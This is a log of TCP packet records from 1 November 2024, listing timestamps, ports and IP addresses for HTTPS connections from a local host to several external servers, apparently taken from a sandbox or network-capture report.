Nov 1, 2024 20:53:13.121423960 CET	49781	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.482793093 CET	443	49779	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.482870102 CET	443	49779	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.482990026 CET	49779	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.483433008 CET	49779	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.483443975 CET	443	49779	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.484124899 CET	49780	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.527960062 CET	443	49780	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.590186119 CET	443	49780	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.590224028 CET	443	49780	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.590265989 CET	443	49780	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.590312958 CET	443	49780	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.590374947 CET	49780	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.590459108 CET	49780	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.590635061 CET	49780	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.590646982 CET	443	49780	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.602933884 CET	443	49781	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.602977991 CET	443	49781	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.603286028 CET	49781	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.603622913 CET	49781	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.603631020 CET	443	49781	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.604305983 CET	49782	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.604326963 CET	443	49782	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:13.604509115 CET	49782	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.604799986 CET	49782	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:13.604811907 CET	443	49782	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:14.006048918 CET	443	49782	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:14.006433010 CET	49782	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:14.006458044 CET	443	49782	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:14.007100105 CET	443	49782	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:14.007544041 CET	49782	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:14.007621050 CET	49782	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:14.007673025 CET	443	49782	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:14.056307077 CET	49782	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:14.209264040 CET	443	49782	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:14.209292889 CET	443	49782	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:14.209362984 CET	443	49782	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:14.209497929 CET	49782	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:14.209511995 CET	443	49782	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:14.209563971 CET	443	49782	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:14.209696054 CET	49782	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:14.209696054 CET	49782	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:14.210072994 CET	49782	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:14.210119009 CET	443	49782	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:16.255528927 CET	49784	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:16.255553961 CET	443	49784	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:16.255727053 CET	49784	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:16.256067038 CET	49784	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:16.256079912 CET	443	49784	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:16.657260895 CET	443	49784	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:16.657738924 CET	49784	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:16.657763958 CET	443	49784	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:16.658446074 CET	443	49784	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:16.659384012 CET	49784	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:16.659543991 CET	443	49784	142.251.40.132	192.168.11.20
Nov 1, 2024 20:53:16.702162027 CET	49784	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:18.459698915 CET	49788	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:18.459779978 CET	443	49788	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:18.459966898 CET	49788	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:18.460146904 CET	49788	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:18.460197926 CET	443	49788	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:18.835397005 CET	443	49788	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:18.835635900 CET	49788	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:18.836003065 CET	49788	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:18.836049080 CET	443	49788	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:18.837565899 CET	49788	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:18.837565899 CET	49788	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:18.837613106 CET	443	49788	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:18.837636948 CET	443	49788	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:19.487348080 CET	49784	443	192.168.11.20	142.251.40.132
Nov 1, 2024 20:53:19.795543909 CET	443	49788	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:19.795717955 CET	443	49788	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:19.795720100 CET	49788	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:19.795922041 CET	49788	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:19.796268940 CET	49788	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:19.796318054 CET	443	49788	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:24.299649954 CET	49789	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:24.299736023 CET	443	49789	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:24.299907923 CET	49789	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:24.300110102 CET	49789	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:24.300160885 CET	443	49789	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:24.675612926 CET	443	49789	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:24.675793886 CET	49789	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:24.676117897 CET	49789	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:24.676162004 CET	443	49789	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:24.677424908 CET	49789	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:24.677424908 CET	49789	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:24.677472115 CET	443	49789	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:24.677496910 CET	443	49789	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:25.306576014 CET	49790	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:25.306685925 CET	443	49790	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:25.306905985 CET	49790	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:25.307080030 CET	49790	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:25.307132006 CET	443	49790	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:25.640376091 CET	443	49789	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:25.640530109 CET	443	49789	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:25.640590906 CET	49789	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:25.640681982 CET	49789	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:25.641613960 CET	49789	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:25.641668081 CET	443	49789	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:25.681920052 CET	443	49790	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:25.682138920 CET	49790	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:25.682356119 CET	49790	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:25.682414055 CET	443	49790	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:25.683692932 CET	49790	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:25.683692932 CET	49790	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:25.683741093 CET	443	49790	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:25.683764935 CET	443	49790	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:25.683790922 CET	49790	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:25.683806896 CET	443	49790	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:26.389523983 CET	49791	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:26.389611959 CET	443	49791	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:26.389856100 CET	49791	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:26.390047073 CET	49791	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:26.390099049 CET	443	49791	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:26.655759096 CET	443	49790	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:26.655908108 CET	443	49790	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:26.656013012 CET	49790	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:26.656109095 CET	49790	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:26.656877041 CET	49790	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:26.656932116 CET	443	49790	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:26.764306068 CET	443	49791	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:26.764483929 CET	49791	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:26.764739990 CET	49791	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:26.764770985 CET	443	49791	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:26.766092062 CET	49791	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:26.766138077 CET	443	49791	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:27.739411116 CET	443	49791	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:27.739461899 CET	443	49791	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:27.739648104 CET	49791	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:27.739708900 CET	49791	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:27.740303040 CET	49791	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:53:27.740318060 CET	443	49791	188.245.203.37	192.168.11.20
Nov 1, 2024 20:53:30.203509092 CET	49792	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:30.203547955 CET	443	49792	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:30.203759909 CET	49792	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:30.204037905 CET	49792	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:30.204056025 CET	443	49792	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:30.438220024 CET	49793	443	192.168.11.20	40.126.24.149
Nov 1, 2024 20:53:30.438236952 CET	443	49793	40.126.24.149	192.168.11.20
Nov 1, 2024 20:53:30.438446045 CET	49793	443	192.168.11.20	40.126.24.149
Nov 1, 2024 20:53:30.438530922 CET	49793	443	192.168.11.20	40.126.24.149
Nov 1, 2024 20:53:30.438535929 CET	443	49793	40.126.24.149	192.168.11.20
Nov 1, 2024 20:53:30.526931047 CET	443	49792	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:30.527139902 CET	49792	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:30.537889957 CET	49792	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:30.537895918 CET	443	49792	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:30.538080931 CET	443	49792	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:30.538625956 CET	49792	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:30.538625956 CET	49792	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:30.538675070 CET	443	49792	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:30.759402037 CET	443	49793	40.126.24.149	192.168.11.20
Nov 1, 2024 20:53:30.759584904 CET	49793	443	192.168.11.20	40.126.24.149
Nov 1, 2024 20:53:30.760984898 CET	49793	443	192.168.11.20	40.126.24.149
Nov 1, 2024 20:53:30.760993004 CET	443	49793	40.126.24.149	192.168.11.20
Nov 1, 2024 20:53:30.761239052 CET	443	49793	40.126.24.149	192.168.11.20
Nov 1, 2024 20:53:30.761656046 CET	49793	443	192.168.11.20	40.126.24.149
Nov 1, 2024 20:53:30.761735916 CET	49793	443	192.168.11.20	40.126.24.149
Nov 1, 2024 20:53:30.761756897 CET	443	49793	40.126.24.149	192.168.11.20
Nov 1, 2024 20:53:30.768965006 CET	443	49792	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:30.768981934 CET	443	49792	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:30.769026995 CET	443	49792	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:30.769166946 CET	49792	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:30.769166946 CET	49792	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:30.769439936 CET	49792	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:30.769439936 CET	49792	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:30.769454956 CET	443	49792	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:30.769459963 CET	443	49792	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:31.032222986 CET	443	49793	40.126.24.149	192.168.11.20
Nov 1, 2024 20:53:31.032234907 CET	443	49793	40.126.24.149	192.168.11.20
Nov 1, 2024 20:53:31.032289028 CET	443	49793	40.126.24.149	192.168.11.20
Nov 1, 2024 20:53:31.032358885 CET	49793	443	192.168.11.20	40.126.24.149
Nov 1, 2024 20:53:31.032496929 CET	49793	443	192.168.11.20	40.126.24.149
Nov 1, 2024 20:53:31.032613993 CET	49793	443	192.168.11.20	40.126.24.149
Nov 1, 2024 20:53:31.032613993 CET	49793	443	192.168.11.20	40.126.24.149
Nov 1, 2024 20:53:31.032627106 CET	443	49793	40.126.24.149	192.168.11.20
Nov 1, 2024 20:53:31.032630920 CET	443	49793	40.126.24.149	192.168.11.20
Nov 1, 2024 20:53:41.420541048 CET	49797	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:41.420567989 CET	443	49797	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:41.420799971 CET	49797	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:41.420927048 CET	49797	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:41.420937061 CET	443	49797	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:41.746392012 CET	443	49797	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:41.746860981 CET	49797	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:41.746881008 CET	443	49797	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:41.747242928 CET	49797	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:41.747242928 CET	49797	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:41.747260094 CET	443	49797	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:41.747268915 CET	443	49797	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:41.747281075 CET	49797	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:41.747287989 CET	443	49797	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:42.027478933 CET	443	49797	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:42.027497053 CET	443	49797	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:42.027563095 CET	443	49797	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:42.027667046 CET	49797	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:42.027667046 CET	49797	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:42.027751923 CET	49797	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:42.027832031 CET	49797	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:42.027930021 CET	49797	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:42.027930021 CET	49797	443	192.168.11.20	20.190.152.20
Nov 1, 2024 20:53:42.027945995 CET	443	49797	20.190.152.20	192.168.11.20
Nov 1, 2024 20:53:42.027951956 CET	443	49797	20.190.152.20	192.168.11.20
Nov 1, 2024 20:57:41.916647911 CET	49799	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:57:41.916678905 CET	443	49799	149.154.167.99	192.168.11.20
Nov 1, 2024 20:57:41.916893005 CET	49799	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:57:41.918395996 CET	49799	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:57:41.918412924 CET	443	49799	149.154.167.99	192.168.11.20
Nov 1, 2024 20:57:42.263886929 CET	443	49799	149.154.167.99	192.168.11.20
Nov 1, 2024 20:57:42.264125109 CET	49799	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:57:42.313672066 CET	49799	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:57:42.313684940 CET	443	49799	149.154.167.99	192.168.11.20
Nov 1, 2024 20:57:42.313913107 CET	443	49799	149.154.167.99	192.168.11.20
Nov 1, 2024 20:57:42.314196110 CET	49799	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:57:42.315274954 CET	49799	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:57:42.360095978 CET	443	49799	149.154.167.99	192.168.11.20
Nov 1, 2024 20:57:42.616405964 CET	443	49799	149.154.167.99	192.168.11.20
Nov 1, 2024 20:57:42.616482019 CET	443	49799	149.154.167.99	192.168.11.20
Nov 1, 2024 20:57:42.616555929 CET	49799	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:57:42.616617918 CET	443	49799	149.154.167.99	192.168.11.20
Nov 1, 2024 20:57:42.616668940 CET	443	49799	149.154.167.99	192.168.11.20
Nov 1, 2024 20:57:42.616712093 CET	443	49799	149.154.167.99	192.168.11.20
Nov 1, 2024 20:57:42.616775036 CET	49799	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:57:42.616849899 CET	49799	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:57:42.617033958 CET	49799	443	192.168.11.20	149.154.167.99
Nov 1, 2024 20:57:42.617091894 CET	443	49799	149.154.167.99	192.168.11.20
Nov 1, 2024 20:57:42.619750977 CET	49800	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:42.619831085 CET	443	49800	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:42.619986057 CET	49800	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:42.620142937 CET	49800	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:42.620183945 CET	443	49800	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:43.002325058 CET	443	49800	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:43.002587080 CET	49800	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:43.002587080 CET	49800	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:43.005002975 CET	49800	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:43.005059004 CET	443	49800	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:43.005990982 CET	443	49800	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:43.006187916 CET	49800	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:43.006421089 CET	49800	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:43.048072100 CET	443	49800	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:43.699421883 CET	443	49800	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:43.699465036 CET	443	49800	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:43.699769974 CET	49800	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:43.700937986 CET	49800	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:43.700952053 CET	443	49800	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:43.702325106 CET	49801	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:43.702343941 CET	443	49801	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:43.702554941 CET	49801	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:43.702766895 CET	49801	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:43.702779055 CET	443	49801	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:44.074481010 CET	443	49801	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:44.074738026 CET	49801	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:44.075114012 CET	49801	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:44.075159073 CET	443	49801	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:44.076395988 CET	49801	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:44.076447010 CET	443	49801	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:44.838409901 CET	443	49801	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:44.838571072 CET	443	49801	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:44.838582993 CET	49801	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:44.838733912 CET	49801	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:44.838784933 CET	49801	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:44.838840008 CET	443	49801	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:44.839762926 CET	49802	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:44.839840889 CET	443	49802	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:44.840013981 CET	49802	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:44.840226889 CET	49802	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:44.840297937 CET	443	49802	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:45.214390039 CET	443	49802	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:45.214579105 CET	49802	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:45.214915037 CET	49802	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:45.214956999 CET	443	49802	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:45.216219902 CET	49802	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:45.216263056 CET	443	49802	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:45.971708059 CET	443	49802	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:45.971757889 CET	443	49802	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:45.971894979 CET	443	49802	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:45.971957922 CET	49802	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:45.972060919 CET	49802	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:45.972121000 CET	49802	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:45.972165108 CET	443	49802	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:45.973172903 CET	49803	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:45.973263979 CET	443	49803	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:45.973448992 CET	49803	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:45.973619938 CET	49803	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:45.973673105 CET	443	49803	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:46.347285032 CET	443	49803	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:46.347498894 CET	49803	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:46.347779989 CET	49803	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:46.347839117 CET	443	49803	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:46.349061966 CET	49803	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:46.349100113 CET	443	49803	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:47.110475063 CET	443	49803	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:47.110528946 CET	443	49803	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:47.110668898 CET	443	49803	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:47.110682011 CET	49803	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:47.110738993 CET	49803	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:47.110903025 CET	49803	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:47.111067057 CET	49803	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:47.111123085 CET	443	49803	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:47.112031937 CET	49804	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:47.112123966 CET	443	49804	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:47.112384081 CET	49804	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:47.112502098 CET	49804	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:47.112530947 CET	443	49804	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:47.486884117 CET	443	49804	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:47.487082958 CET	49804	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:47.487591028 CET	49804	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:47.487634897 CET	443	49804	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:47.489867926 CET	49804	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:47.489912033 CET	443	49804	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:48.252374887 CET	443	49804	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:48.252415895 CET	443	49804	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:48.252537012 CET	49804	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:48.252801895 CET	49804	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:48.252815008 CET	443	49804	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:48.392261982 CET	49805	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:48.392311096 CET	443	49805	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:48.392508984 CET	49805	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:48.392676115 CET	49805	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:48.392705917 CET	443	49805	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:48.765358925 CET	443	49805	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:48.765556097 CET	49805	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:48.765862942 CET	49805	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:48.765899897 CET	443	49805	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:48.768233061 CET	49805	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:48.768233061 CET	49805	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:48.768273115 CET	443	49805	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:48.768294096 CET	443	49805	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:48.768307924 CET	49805	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:48.768321991 CET	443	49805	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:49.403985023 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:49.404021978 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:49.404165983 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:49.404346943 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:49.404361963 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:49.718728065 CET	443	49805	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:49.718790054 CET	443	49805	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:49.719031096 CET	49805	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:49.720062971 CET	49805	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:49.720082998 CET	443	49805	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:49.774961948 CET	443	49806	188.245.203.37	192.168.11.20
